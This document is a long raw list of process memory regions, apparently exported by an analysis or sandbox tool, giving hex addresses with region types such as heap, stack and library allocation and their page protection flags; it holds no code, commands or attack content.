239FE85E000
heap
page read and write
266F3020000
trusted library allocation
page read and write
236425B0000
heap
page read and write
B08A9FF000
stack
page read and write
26395BB0000
heap
page read and write
2484A15B000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
7FFB18B82000
unkown
page execute and write copy
1FC22D1B000
heap
page read and write
CDBD9FD000
stack
page read and write
1FC2531F000
heap
page read and write
1FC255B0000
heap
page read and write
1B3A8250000
heap
page read and write
1FC25E2D000
heap
page read and write
2940C280000
heap
page read and write
1E8E3501000
trusted library allocation
page read and write
267C1140000
trusted library allocation
page read and write
1FC25556000
heap
page read and write
270D27CC000
heap
page read and write
19DD5150000
heap
page read and write
1C550785000
heap
page read and write
1FC24F6A000
heap
page read and write
281FC2E9000
heap
page read and write
2484C194000
heap
page read and write
1FC25320000
heap
page read and write
1407C890000
heap
page read and write
1E0E2FA7000
heap
page read and write
1E0E15D6000
heap
page read and write
23DC3E72000
heap
page read and write
1FC25550000
heap
page read and write
1E0D9A00000
direct allocation
page read and write
267C1919000
heap
page read and write
1C550799000
heap
page read and write
1FC22D49000
heap
page read and write
270D404D000
heap
page read and write
C063CFF000
stack
page read and write
1E0E15F0000
heap
page read and write
1FC2532D000
heap
page read and write
1B3A8370000
heap
page read and write
2484A455000
heap
page read and write
27E84C90000
heap
page read and write
D6E7AFF000
stack
page read and write
1FC25616000
heap
page read and write
270D27A8000
heap
page read and write
281FC40C000
heap
page read and write
1E0E15AE000
heap
page read and write
1407B22B000
heap
page read and write
1C55076E000
heap
page read and write
7FF74EEFA000
unkown
page read and write
C602FFF000
unkown
page read and write
7FFB18B81000
unkown
page execute and read and write
23AC6129000
heap
page read and write
245455F2000
heap
page read and write
2484A2D0000
trusted library allocation
page read and write
23098014000
heap
page read and write
239FE8D6000
heap
page execute and read and write
1E8E34F9000
trusted library allocation
page read and write
281FC35D000
heap
page read and write
1B3A823B000
heap
page read and write
1CE58904000
heap
page read and write
1CEF3F85000
heap
page read and write
4C53D7E000
stack
page read and write
266F30A8000
heap
page read and write
23AC5B28000
heap
page read and write
267C1608000
heap
page read and write
29AC2340000
heap
page read and write
1C5507A9000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
1FC252EE000
heap
page read and write
2484A153000
heap
page read and write
4C53CFF000
stack
page read and write
2484A45A000
heap
page read and write
1E181C10000
heap
page read and write
1FC256AF000
heap
page read and write
270D27BF000
heap
page read and write
1DD0E8A0000
heap
page read and write
1E0D6465000
heap
page read and write
20C72EF0000
heap
page read and write
1FC2560A000
heap
page read and write
1E0D6804000
heap
page read and write
239E6995000
trusted library allocation
page read and write
1C5500A1000
heap
page read and write
1DD0C808000
heap
page read and write
24545603000
heap
page read and write
270D2245000
heap
page read and write
270D2222000
heap
page read and write
1FC22D1B000
heap
page read and write
267A7680000
heap
page read and write
51D497E000
stack
page read and write
1FC25554000
heap
page read and write
2637A164000
heap
page read and write
23AC5B35000
heap
page read and write
5C54FC000
stack
page read and write
1E8E3FF1000
heap
page read and write
1FC25652000
heap
page read and write
1FC25652000
heap
page read and write
2940C600000
heap
page read and write
2484A168000
heap
page read and write
7FFB0B6F1000
unkown
page execute and read and write
1FC26144000
heap
page read and write
239E48D2000
heap
page read and write
2C25EEF0000
heap
page read and write
2484A7EC000
heap
page read and write
1DD0C808000
heap
page read and write
D7416FE000
stack
page read and write
1E0E1601000
heap
page read and write
1FC24E7C000
heap
page read and write
1A2CE510000
heap
page read and write
CDBDC7F000
stack
page read and write
2BA38E50000
heap
page read and write
266F36DA000
heap
page read and write
1E0D643A000
heap
page read and write
270D27AE000
heap
page read and write
2422BD30000
heap
page read and write
76BB479000
stack
page read and write
236408A4000
heap
page read and write
23AC6107000
heap
page read and write
1E0D644F000
heap
page read and write
157757E000
stack
page read and write
25D4E191000
heap
page read and write
23AC5B56000
heap
page read and write
281FC3EF000
heap
page read and write
544A5FE000
unkown
page read and write
157737E000
stack
page read and write
165335C0000
heap
page read and write
23097D42000
heap
page read and write
1C5500DB000
heap
page read and write
7FFB0D720000
unkown
page readonly
1B3A8375000
heap
page read and write
27EA9A82000
heap
page read and write
1E0E1604000
heap
page read and write
270D2244000
heap
page read and write
1E0D6456000
heap
page read and write
239FE81F000
heap
page read and write
1FC25550000
heap
page read and write
1FC255C7000
heap
page read and write
1CEF25B2000
heap
page read and write
1E0E15BA000
heap
page read and write
267C19EB000
heap
page read and write
51D467E000
stack
page read and write
165335FE000
heap
page read and write
1690F72C000
heap
page read and write
267B9120000
trusted library allocation
page read and write
22972EB2000
heap
page read and write
2484A152000
heap
page read and write
1FC253DF000
heap
page read and write
1DCE32D0000
heap
page read and write
24545714000
heap
page read and write
17FCEFD4000
heap
page read and write
1CEF25A0000
heap
page read and write
579B2FE000
stack
page read and write
267A7964000
heap
page read and write
4C53E7E000
stack
page read and write
1FC2519E000
heap
page read and write
1B3A8350000
heap
page read and write
266F3067000
heap
page read and write
1CEF1FB0000
trusted library allocation
page read and write
266F3096000
heap
page read and write
2484A10F000
heap
page read and write
270D226D000
heap
page read and write
1FC25320000
heap
page read and write
23AC59C0000
heap
page read and write
1C550135000
heap
page read and write
1E7B5F00000
heap
page read and write
28425E61000
heap
page read and write
1E8E41D2000
heap
page read and write
1407B295000
heap
page read and write
23AC5AE0000
trusted library allocation
page read and write
7FFB0C290000
unkown
page readonly
266F3093000
heap
page read and write
7FFB0C291000
unkown
page execute read
1FC24EA8000
heap
page read and write
1E0D645F000
heap
page read and write
266F309C000
heap
page read and write
27EA9A7A000
heap
page read and write
15767FE000
unkown
page readonly
E6BFEFF000
stack
page read and write
2484C194000
heap
page read and write
1FC25566000
heap
page read and write
239FECD0000
heap
page read and write
165336E0000
heap
page read and write
267C1185000
heap
page read and write
1C54FF30000
heap
page read and write
79003FF000
stack
page read and write
1FC2533E000
heap
page read and write
239E8080000
trusted library allocation
page read and write
1407B2A2000
heap
page read and write
135F0601000
heap
page read and write
1407CAF0000
remote allocation
page read and write
1407C880000
heap
page read and write
1FC25602000
heap
page read and write
7FFB0C403000
unkown
page read and write
2484A453000
heap
page read and write
1DCE30EA000
heap
page read and write
1FC2561E000
heap
page read and write
24BA397B000
heap
page read and write
270D2220000
heap
page read and write
266F36B0000
heap
page read and write
1C5500C2000
heap
page read and write
239F6770000
trusted library allocation
page read and write
23DC3E72000
heap
page read and write
7FFAA9374000
trusted library allocation
page read and write
270D223A000
heap
page read and write
266F309F000
heap
page read and write
7FFB0D736000
unkown
page readonly
1690F739000
heap
page read and write
1FC25360000
heap
page read and write
2C25F010000
heap
page read and write
2DE1CEE0000
heap
page read and write
23195F14000
heap
page read and write
1E8E90F2000
trusted library allocation
page read and write
1C550280000
heap
page read and write
1E8E34F5000
trusted library allocation
page read and write
1407C842000
heap
page read and write
1FC24F6A000
heap
page read and write
23AC60FE000
heap
page read and write
1E0D9BA9000
direct allocation
page read and write
1FC24ECD000
heap
page read and write
7FFB0B801000
unkown
page execute and read and write
270D218B000
heap
page read and write
17FCEEB0000
heap
page read and write
23097D42000
heap
page read and write
1FC2526D000
heap
page read and write
9E60FF000
unkown
page read and write
1E0D6455000
heap
page read and write
7FF6DC73E000
unkown
page read and write
76BB7F8000
stack
page read and write
1FC252ED000
heap
page read and write
239E4A7D000
heap
page read and write
1CEF258F000
heap
page read and write
266F4F50000
heap
page read and write
76F4FFF000
stack
page read and write
1FC24E71000
heap
page read and write
1FC25C50000
direct allocation
page read and write
281FC3EF000
heap
page read and write
1FC255BF000
heap
page read and write
1FC253E4000
heap
page read and write
1AD18AC0000
heap
page read and write
23640854000
heap
page read and write
7FFAA9780000
trusted library allocation
page read and write
579B0FE000
stack
page read and write
281FC51B000
heap
page read and write
28425E6C000
heap
page read and write
1E8E3FD8000
heap
page read and write
627ABFF000
stack
page read and write
1E0E15EE000
heap
page read and write
266F36E2000
heap
page read and write
1CEF20A7000
heap
page read and write
2422BD40000
heap
page read and write
1E0E160B000
heap
page read and write
1E0E15B5000
heap
page read and write
28425E6C000
heap
page read and write
7FF74EEE0000
unkown
page readonly
1DEE7C85000
heap
page read and write
1FC251A9000
heap
page read and write
1FC25370000
heap
page read and write
1CEF2682000
heap
page read and write
1DD0C759000
heap
page read and write
1FC22D70000
heap
page read and write
270D4180000
heap
page read and write
13C876A1000
heap
page read and write
579ADFE000
stack
page read and write
281FC540000
heap
page read and write
1FC251A9000
heap
page read and write
239FE7C7000
heap
page read and write
1407C150000
trusted library section
page readonly
15C999F0000
heap
page read and write
270D404E000
heap
page read and write
2CFCBE6000
stack
page read and write
7FFAA96C0000
trusted library allocation
page read and write
23AC5B61000
heap
page read and write
1FC255D2000
heap
page read and write
608A07E000
stack
page read and write
1C55079F000
heap
page read and write
1EA2312C000
heap
page read and write
1DD10300000
heap
page read and write
1E4CFA0F000
heap
page read and write
1407CA30000
trusted library allocation
page read and write
1E0D6486000
heap
page read and write
24BA398A000
heap
page read and write
1E8E3502000
trusted library allocation
page read and write
1B3A8380000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
7FFB18B84000
unkown
page read and write
C6858FF000
unkown
page read and write
7FFB0C290000
unkown
page readonly
7FFAA9550000
trusted library allocation
page execute and read and write
1FC25562000
heap
page read and write
202E56F0000
heap
page read and write
1DCE32C5000
heap
page read and write
1FC252E9000
heap
page read and write
579ACFE000
stack
page read and write
2364089F000
heap
page read and write
1FC25CC0000
heap
page read and write
20D43B0B000
heap
page read and write
23097D2B000
heap
page read and write
1FC2536B000
heap
page read and write
270D223E000
heap
page read and write
1E8E4049000
heap
page read and write
1FC24F69000
heap
page read and write
1FC25641000
heap
page read and write
1DD0FA38000
heap
page read and write
1C550781000
heap
page read and write
1909D650000
heap
page read and write
27EA9A72000
heap
page read and write
26A1C547000
heap
page read and write
1E0D645C000
heap
page read and write
76BB87E000
stack
page read and write
239FE837000
heap
page read and write
1E0D6510000
heap
page read and write
1E0D7FB0000
heap
page read and write
236408C1000
heap
page read and write
1407C8F2000
heap
page read and write
7FFB0C607000
unkown
page execute and read and write
7FFB0C5DB000
unkown
page execute and read and write
7FFB0B8AD000
unkown
page execute and read and write
7FFAA9710000
trusted library allocation
page read and write
1CEF2097000
heap
page read and write
1FC25320000
heap
page read and write
7FFAA9580000
trusted library allocation
page read and write
1E8E3FE2000
heap
page read and write
1FC22D12000
heap
page read and write
1700BB54000
heap
page read and write
2484A173000
heap
page read and write
1E0D7EC0000
direct allocation
page read and write
627A7FB000
stack
page read and write
7FFB1E479000
unkown
page execute and read and write
267AAA17000
trusted library allocation
page read and write
7FFAA9650000
trusted library allocation
page read and write
281FC2A0000
heap
page read and write
2940C2A0000
heap
page read and write
7FFAA9400000
trusted library allocation
page read and write
25D4E360000
heap
page read and write
15C99A91000
heap
page read and write
1909D570000
heap
page read and write
627AAFF000
unkown
page read and write
267AA7E4000
trusted library allocation
page read and write
7FFB0C2B2000
unkown
page readonly
1FC2531B000
heap
page read and write
81D26FF000
stack
page read and write
270D2140000
trusted library allocation
page read and write
239FEA22000
heap
page read and write
A2D7DFF000
stack
page read and write
267AA9FD000
trusted library allocation
page read and write
281FC3E0000
heap
page read and write
1FC2613E000
heap
page read and write
7FFAA9760000
trusted library allocation
page read and write
1E8E404A000
heap
page read and write
1C5507A2000
heap
page read and write
1FC256CC000
heap
page read and write
231960B0000
heap
page read and write
1FC24F69000
heap
page read and write
1DD0C808000
heap
page read and write
281FC352000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1E0E1601000
heap
page read and write
1FC25980000
direct allocation
page read and write
1E0D64C0000
heap
page read and write
1FC25462000
heap
page read and write
D5945FF000
unkown
page read and write
281FC352000
heap
page read and write
27EA9A82000
heap
page read and write
281FC3F1000
heap
page read and write
281FC230000
heap
page read and write
1CEF2092000
heap
page read and write
16533730000
heap
page read and write
1E0E1592000
heap
page read and write
1690F6D0000
heap
page read and write
1E0E15B4000
heap
page read and write
239E4A70000
heap
page read and write
1E8E41E0000
heap
page read and write
1DD0E99E000
heap
page read and write
1E0E30A4000
heap
page read and write
1FC25641000
heap
page read and write
1FC25675000
heap
page read and write
1AD18B1D000
heap
page read and write
D21407F000
stack
page read and write
1FC255A9000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
239E835F000
trusted library allocation
page read and write
7FFB0BB90000
unkown
page readonly
2BA38B0A000
heap
page read and write
7FFB18B7C000
unkown
page execute and read and write
16533600000
heap
page read and write
1576E7E000
stack
page read and write
2584DAE0000
heap
page read and write
2584DAE0000
heap
page read and write
7FFAA9620000
trusted library allocation
page read and write
1C552024000
heap
page read and write
1FC22D40000
heap
page read and write
2322B3D4000
heap
page read and write
1DCE30E8000
heap
page read and write
D813FF6000
stack
page read and write
1FC25646000
heap
page read and write
1E0D644D000
heap
page read and write
270D2140000
trusted library allocation
page read and write
266F3083000
heap
page read and write
2B526AF4000
heap
page read and write
1FC25C5C000
direct allocation
page read and write
20D43AE8000
heap
page read and write
1B3A823D000
heap
page read and write
24BA3C95000
heap
page read and write
23AC5B69000
heap
page read and write
65B08FF000
stack
page read and write
1FC25D67000
heap
page read and write
1E0D645F000
heap
page read and write
8F797AB000
stack
page read and write
1FC255C1000
heap
page read and write
24B86AC0000
heap
page read and write
1FC26146000
heap
page read and write
270D27C9000
heap
page read and write
1FC25626000
heap
page read and write
1E0E1578000
heap
page read and write
1C550067000
heap
page read and write
270D21E7000
heap
page read and write
7FF74EE71000
unkown
page execute read
22972EC2000
heap
page read and write
1E181D00000
heap
page read and write
1CEF2580000
heap
page read and write
1E8E34FB000
trusted library allocation
page read and write
1CEF1FB0000
trusted library allocation
page read and write
24545602000
heap
page read and write
7FFB1BB2C000
unkown
page execute and write copy
28425E69000
heap
page read and write
7FFAA9683000
trusted library allocation
page read and write
28425E59000
heap
page read and write
776FAFF000
stack
page read and write
1C28FFF000
unkown
page read and write
1FC2531E000
heap
page read and write
1E0D9940000
direct allocation
page read and write
2484A48B000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
D213D3D000
stack
page read and write
1E0E1619000
heap
page read and write
7FFAA936B000
trusted library allocation
page read and write
1AB5E297000
heap
page read and write
4C53C7F000
stack
page read and write
7FFB0C2B0000
unkown
page read and write
1FC25D76000
heap
page read and write
2484A0E0000
trusted library allocation
page read and write
1FC256B8000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1E4CFA15000
heap
page read and write
1407C160000
trusted library section
page readonly
1C550127000
heap
page read and write
2484A137000
heap
page read and write
270D27D2000
heap
page read and write
76BB3FF000
stack
page read and write
1FC25641000
heap
page read and write
1700B7E0000
heap
page read and write
1DD0FB22000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
266F3094000
heap
page read and write
1DD0C75E000
heap
page read and write
1FC25320000
heap
page read and write
1FC24F4F000
heap
page read and write
1DCE30F2000
heap
page read and write
270D27B4000
heap
page read and write
2484A113000
heap
page read and write
1FC2533A000
heap
page read and write
1FC252ED000
heap
page read and write
E0903CC000
stack
page read and write
1FC256C4000
heap
page read and write
267A78A0000
heap
page execute and read and write
1E8E34FE000
trusted library allocation
page read and write
270D218A000
heap
page read and write
7FF6DC744000
unkown
page readonly
7FFB0C2B2000
unkown
page readonly
1DD0FAA0000
heap
page read and write
2322B430000
heap
page read and write
1CEF25B4000
heap
page read and write
23DC3E62000
heap
page read and write
B2B887D000
stack
page read and write
26379DB0000
heap
page read and write
1E0E3090000
heap
page readonly
1DEE7CBB000
heap
page read and write
1FC256C4000
heap
page read and write
266F4F66000
heap
page read and write
266F36D9000
heap
page read and write
281FC2E0000
heap
page read and write
7FFAA95E0000
trusted library allocation
page read and write
1E0E15F7000
heap
page read and write
1CEF268B000
heap
page read and write
1E7B5F70000
heap
page read and write
245456F0000
heap
page read and write
1FC255D0000
heap
page read and write
266F36C8000
heap
page read and write
1DD0C739000
heap
page read and write
1690F6C0000
heap
page read and write
1407C8C6000
heap
page read and write
93AF4FC000
stack
page read and write
1C550799000
heap
page read and write
2DE1CD00000
heap
page read and write
1E0E161F000
heap
page read and write
135F0601000
heap
page read and write
1E8E41E1000
heap
page read and write
1DD0FB2A000
heap
page read and write
1CE587C7000
heap
page read and write
281FC3FB000
heap
page read and write
270D2229000
heap
page read and write
1E0D649D000
heap
page read and write
23AC5B61000
heap
page read and write
1E8E404A000
heap
page read and write
28425E5D000
heap
page read and write
2484A166000
heap
page read and write
270D21E7000
heap
page read and write
1E5FA760000
heap
page read and write
1DD0C735000
heap
page read and write
1BCD0E40000
heap
page read and write
7FFB1C265000
unkown
page execute and read and write
51D44FC000
stack
page read and write
13C87680000
heap
page read and write
2484A138000
heap
page read and write
267AA633000
trusted library allocation
page read and write
1E0D6451000
heap
page read and write
2484C182000
heap
page read and write
23AC5B55000
heap
page read and write
1FC26160000
heap
page read and write
130EBFF000
unkown
page read and write
7FFB0D736000
unkown
page readonly
267AA62F000
trusted library allocation
page read and write
236408C4000
heap
page read and write
1E8E4056000
heap
page read and write
135F05E0000
heap
page read and write
1FC24F4C000
heap
page read and write
7FF6DC700000
unkown
page readonly
270D2231000
heap
page read and write
1FC25F8B000
heap
page read and write
2484A2D0000
trusted library allocation
page read and write
1FC2540D000
heap
page read and write
B26CF7E000
stack
page read and write
1DD0FB22000
heap
page read and write
270D404E000
heap
page read and write
1FC25564000
heap
page read and write
1C5500EB000
heap
page read and write
23AC6139000
heap
page read and write
7FFAA96DA000
trusted library allocation
page read and write
2484A177000
heap
page read and write
1CEF25AC000
heap
page read and write
1C5500F9000
heap
page read and write
29AC2480000
heap
page read and write
1DD0E99E000
heap
page read and write
20D43B07000
heap
page read and write
7FFAA9430000
trusted library allocation
page read and write
1FC255BF000
heap
page read and write
23195F15000
heap
page read and write
267A7758000
heap
page read and write
7FFB0C5B5000
unkown
page execute and write copy
7FF74EF1E000
unkown
page readonly
1FC2534A000
heap
page read and write
20D43AD6000
heap
page read and write
7FFB1AB15000
unkown
page execute and read and write
1E8E404A000
heap
page read and write
7FFB0BA60000
unkown
page execute and read and write
1C550010000
heap
page read and write
281FC3E7000
heap
page read and write
92C156D000
stack
page read and write
281FC31F000
heap
page read and write
7FFAA96C0000
trusted library allocation
page read and write
1E8E3515000
trusted library allocation
page read and write
13C8768A000
heap
page read and write
CB1DCFC000
stack
page read and write
1E8E34FE000
trusted library allocation
page read and write
1E0E2FAC000
heap
page read and write
1E0E15BA000
heap
page read and write
1FC2530F000
heap
page read and write
87C017E000
stack
page read and write
1E0E1601000
heap
page read and write
1FC25338000
heap
page read and write
1407C906000
heap
page read and write
1E0E15D6000
heap
page read and write
244EE394000
heap
page read and write
281FC345000
heap
page read and write
B2B8538000
stack
page read and write
1FC25601000
heap
page read and write
2BA38CD0000
heap
page read and write
23AC5BF0000
trusted library allocation
page read and write
270D2244000
heap
page read and write
1407D000000
heap
page read and write
135F0805000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
1DD0C80A000
heap
page read and write
5C56FF000
stack
page read and write
16533617000
heap
page read and write
1FC2564C000
heap
page read and write
267B9182000
trusted library allocation
page read and write
23097D3A000
heap
page read and write
2484A162000
heap
page read and write
1407BA02000
heap
page read and write
1576FFE000
unkown
page readonly
1FC25371000
heap
page read and write
1E0E15BA000
heap
page read and write
2BA9E645000
heap
page read and write
1E0E15E5000
heap
page read and write
1E0D64DA000
heap
page read and write
1BCD0E4B000
heap
page read and write
7FF74EE70000
unkown
page readonly
1FC2612D000
heap
page read and write
1FC2559D000
heap
page read and write
267AA9E6000
trusted library allocation
page read and write
7FFB0C2A6000
unkown
page readonly
1EA2311F000
heap
page read and write
1E0E15D0000
heap
page read and write
1407B2FF000
heap
page read and write
266F36D9000
heap
page read and write
270D4043000
heap
page read and write
23098015000
heap
page read and write
2484A0E0000
trusted library allocation
page read and write
270D2266000
heap
page read and write
2BA38CF0000
heap
page read and write
1FC2559D000
heap
page read and write
266F3076000
heap
page read and write
8251FCE000
stack
page read and write
1FC25312000
heap
page read and write
7E7A3BF000
stack
page read and write
270D218E000
heap
page read and write
1FC2613B000
heap
page read and write
7FF74EF18000
unkown
page readonly
1E4CF9C9000
heap
page read and write
1C550123000
heap
page read and write
1DEE7CAC000
heap
page read and write
267C1110000
trusted library allocation
page read and write
7FFAA9383000
trusted library allocation
page execute and read and write
1FC246E0000
heap
page read and write
23AC610E000
heap
page read and write
23AC5B66000
heap
page read and write
1E0E1619000
heap
page read and write
266F3042000
heap
page read and write
1FC25359000
heap
page read and write
1A2CE4B0000
heap
page read and write
1E8E34FB000
trusted library allocation
page read and write
1E0E15E1000
heap
page read and write
267A9338000
trusted library allocation
page read and write
15768FD000
stack
page read and write
B26CEFF000
stack
page read and write
1FC2561A000
heap
page read and write
1C55076B000
heap
page read and write
1407C8A0000
trusted library allocation
page read and write
270D226A000
heap
page read and write
1E8E3FF1000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
1FC2612A000
heap
page read and write
270D2232000
heap
page read and write
7FFAA937D000
trusted library allocation
page execute and read and write
7FFB0C291000
unkown
page execute read
BAC7EFF000
stack
page read and write
1FC255B2000
heap
page read and write
1FC25332000
heap
page read and write
1FC24E70000
heap
page read and write
CB1DEFF000
stack
page read and write
1FC25656000
heap
page read and write
1FC24ABC000
direct allocation
page read and write
1E8E4644000
heap
page read and write
1FC251C7000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
23AC6129000
heap
page read and write
1FC2566D000
heap
page read and write
2484A7F9000
heap
page read and write
1FC2532D000
heap
page read and write
1E0E1700000
trusted library allocation
page read and write
23640860000
heap
page read and write
26379E71000
heap
page read and write
2484A137000
heap
page read and write
270D2232000
heap
page read and write
1E0D64CC000
heap
page read and write
2584DC20000
heap
page read and write
239FEA2C000
heap
page read and write
7FFAA9550000
trusted library allocation
page read and write
23AC79E1000
heap
page read and write
87C007E000
stack
page read and write
1CEF2092000
heap
page read and write
1FC22D40000
heap
page read and write
1FC25656000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
1E0E1622000
heap
page read and write
23DC3E50000
heap
page read and write
1FC25659000
heap
page read and write
1DD0FB12000
heap
page read and write
1DD0FAC8000
heap
page read and write
239E4710000
heap
page read and write
1C5500A1000
heap
page read and write
135F0570000
heap
page read and write
23AC79E4000
heap
page read and write
1FC24F69000
heap
page read and write
28425E67000
heap
page read and write
24BA398A000
heap
page read and write
1407CA20000
trusted library allocation
page read and write
266F30A1000
heap
page read and write
1CE587B0000
heap
page read and write
1E0E17E6000
heap
page read and write
28425E35000
heap
page read and write
7FFAA939B000
trusted library allocation
page read and write
1A2CE4E0000
heap
page read and write
1407CA20000
trusted library allocation
page read and write
7FFB0C2B2000
unkown
page readonly
1FC25359000
heap
page read and write
1FC252B9000
heap
page read and write
23AC5B50000
heap
page read and write
1E4CFA0F000
heap
page read and write
23097D2D000
heap
page read and write
7FFB1AB10000
unkown
page execute and read and write
D7414E3000
stack
page read and write
15773FE000
unkown
page readonly
1E0E1593000
heap
page read and write
239E4990000
trusted library allocation
page read and write
7FFAA9630000
trusted library allocation
page read and write
23098010000
heap
page read and write
76BB57A000
stack
page read and write
22972EC2000
heap
page read and write
1FC22D6C000
heap
page read and write
1E8E402B000
heap
page read and write
1FC22D1B000
heap
page read and write
270D21D0000
heap
page read and write
2422BEE0000
heap
page read and write
1DD0C660000
heap
page readonly
1DD0C808000
heap
page read and write
239FE921000
heap
page read and write
19BC6790000
heap
page read and write
1407C8F9000
heap
page read and write
7FFB0D740000
unkown
page read and write
13C87984000
heap
page read and write
1DD0C797000
heap
page read and write
1AB5E2A9000
heap
page read and write
2F198FF000
unkown
page read and write
22972EC2000
heap
page read and write
1E0D9A60000
direct allocation
page read and write
1E8E352F000
trusted library allocation
page read and write
270D222F000
heap
page read and write
1FC255FA000
heap
page read and write
1FC255FA000
heap
page read and write
1A2CE3BA000
heap
page read and write
1EA232D0000
heap
page read and write
1DD0C650000
heap
page read and write
1F52B8C7000
heap
page read and write
D8EC07F000
stack
page read and write
1690F75B000
heap
page read and write
239E4890000
heap
page read and write
1C55201E000
heap
page read and write
1E8E4120000
trusted library allocation
page execute
281FC346000
heap
page read and write
281FC346000
heap
page read and write
7FF74EF1E000
unkown
page readonly
1909D470000
heap
page read and write
1DD0FB32000
heap
page read and write
73D287F000
stack
page read and write
2B526767000
heap
page read and write
7FFB0C59C000
unkown
page execute and read and write
1FC25602000
heap
page read and write
1C550124000
heap
page read and write
23AC6114000
heap
page read and write
7FFAA95E0000
trusted library allocation
page read and write
2484A139000
heap
page read and write
1CEF25A0000
heap
page read and write
1FC255E0000
heap
page read and write
7FFAA9580000
trusted library allocation
page read and write
7FFB0C2A6000
unkown
page readonly
281FC409000
heap
page read and write
7FFB1C251000
unkown
page execute and read and write
1FC24F4C000
heap
page read and write
1E0E1558000
heap
page read and write
23AC5BF0000
trusted library allocation
page read and write
266F303E000
heap
page read and write
1E0E1596000
heap
page read and write
130EAFC000
stack
page read and write
1FC25648000
heap
page read and write
7FFB0D740000
unkown
page read and write
1DEE7C85000
heap
page read and write
1FC255C2000
heap
page read and write
1E0E1555000
heap
page read and write
1E0D6800000
heap
page read and write
1E0E15D6000
heap
page read and write
1DD0FAE0000
heap
page read and write
1CEF2587000
heap
page read and write
1CE587D1000
heap
page read and write
20D43AD5000
heap
page read and write
13C87990000
heap
page read and write
2B526AF0000
heap
page read and write
2484A7DF000
heap
page read and write
1FC25308000
heap
page read and write
1FC22D70000
heap
page read and write
2422BD34000
heap
page read and write
76BB97C000
stack
page read and write
1B3A8250000
heap
page read and write
20C72DB1000
heap
page read and write
1E0D64BE000
heap
page read and write
1E4CF9FA000
heap
page read and write
281FC333000
heap
page read and write
1FC25569000
heap
page read and write
17FCEF90000
heap
page read and write
1C550135000
heap
page read and write
266F36D9000
heap
page read and write
7FF74EF0E000
unkown
page read and write
281FC514000
heap
page read and write
1FC2560E000
heap
page read and write
1FC253D7000
heap
page read and write
1DD0C799000
heap
page read and write
20D43B0B000
heap
page read and write
1FC25560000
heap
page read and write
1E0E1592000
heap
page read and write
28425E6C000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1FC260CA000
heap
page read and write
1BCD0E70000
heap
page read and write
2322B430000
heap
page read and write
51D40B2000
stack
page read and write
270D2275000
heap
page read and write
7FFB24AC1000
unkown
page execute and read and write
270D27AF000
heap
page read and write
2484A480000
heap
page read and write
267C15D0000
heap
page read and write
1E0E15BA000
heap
page read and write
7FF6DC701000
unkown
page execute read
7FFB0BB38000
unkown
page execute and read and write
1DEE7CB0000
heap
page read and write
1FC25681000
heap
page read and write
7FFAA96D0000
trusted library allocation
page read and write
23097D42000
heap
page read and write
1FC2561D000
heap
page read and write
1DEE7CA7000
heap
page read and write
7FFAA9610000
trusted library allocation
page read and write
1C550767000
heap
page read and write
26395BB0000
heap
page read and write
1DD0FA88000
heap
page read and write
24BA3970000
heap
page read and write
1FC2555C000
heap
page read and write
7FFAA9520000
trusted library allocation
page execute and read and write
266F36CF000
heap
page read and write
267A7906000
heap
page read and write
244EE050000
heap
page read and write
239FE9E4000
heap
page read and write
1CEF2086000
heap
page read and write
1C550767000
heap
page read and write
1909D567000
heap
page read and write
1DEE7C91000
heap
page read and write
2484A420000
heap
page read and write
1FC256A1000
heap
page read and write
1FC25652000
heap
page read and write
266F30A2000
heap
page read and write
16533605000
heap
page read and write
266F3091000
heap
page read and write
1FC22D71000
heap
page read and write
1E0E1555000
heap
page read and write
1FC25BC4000
direct allocation
page read and write
7DF448C80000
trusted library allocation
page execute and read and write
24B86AB5000
heap
page read and write
1FC2554B000
heap
page read and write
1E0D6463000
heap
page read and write
7FFB0C291000
unkown
page execute read
20C72DB1000
heap
page read and write
236408FD000
heap
page read and write
7FFB0C60F000
unkown
page execute and read and write
16533740000
heap
page read and write
1FC252EA000
heap
page read and write
1C550284000
heap
page read and write
1FC25566000
heap
page read and write
7FFB1AB01000
unkown
page execute and read and write
1DD0C80A000
heap
page read and write
2484A7F9000
heap
page read and write
1C550788000
heap
page read and write
B26CFFE000
stack
page read and write
267C189B000
heap
page read and write
239FE843000
heap
page read and write
1B3A8247000
heap
page read and write
1FC2519E000
heap
page read and write
1FC25659000
heap
page read and write
281FC414000
heap
page read and write
608A17F000
stack
page read and write
2C25F0B0000
heap
page read and write
20C72DB1000
heap
page read and write
1CEF3F74000
heap
page read and write
24545720000
heap
page read and write
270D2244000
heap
page read and write
1E8E4120000
heap
page read and write
1FC24F6A000
heap
page read and write
2637A165000
heap
page read and write
1407CAA0000
trusted library allocation
page read and write
23097D42000
heap
page read and write
1E0E15FB000
heap
page read and write
23AC6139000
heap
page read and write
1FC2519E000
heap
page read and write
1EA2311F000
heap
page read and write
1FC255A0000
heap
page read and write
1C55012B000
heap
page read and write
D8141FF000
stack
page read and write
17FCF052000
heap
page read and write
EE6D73D000
stack
page read and write
7FFB1E4C1000
unkown
page execute and read and write
26379E71000
heap
page read and write
1FC252E8000
heap
page read and write
7FFB0B81D000
unkown
page execute and read and write
1690F74D000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
29AC2485000
heap
page read and write
1DD0FAA0000
heap
page read and write
270D2224000
heap
page read and write
2484A162000
heap
page read and write
1FC25360000
heap
page read and write
266F36D9000
heap
page read and write
1C552024000
heap
page read and write
267C166E000
heap
page read and write
1E0D7EA3000
direct allocation
page read and write
1DD0F9F1000
heap
page read and write
7FFB0C611000
unkown
page execute and write copy
1E5FA77A000
heap
page read and write
7FFAA9382000
trusted library allocation
page read and write
1FC25631000
heap
page read and write
1CEF209D000
heap
page read and write
281FE172000
heap
page read and write
270D2266000
heap
page read and write
239E63F0000
heap
page execute and read and write
7D447FE000
unkown
page read and write
23AC79E3000
heap
page read and write
1E8E3FEB000
heap
page read and write
1E4CF820000
heap
page read and write
7FFAA9532000
trusted library allocation
page read and write
23DC40F0000
heap
page read and write
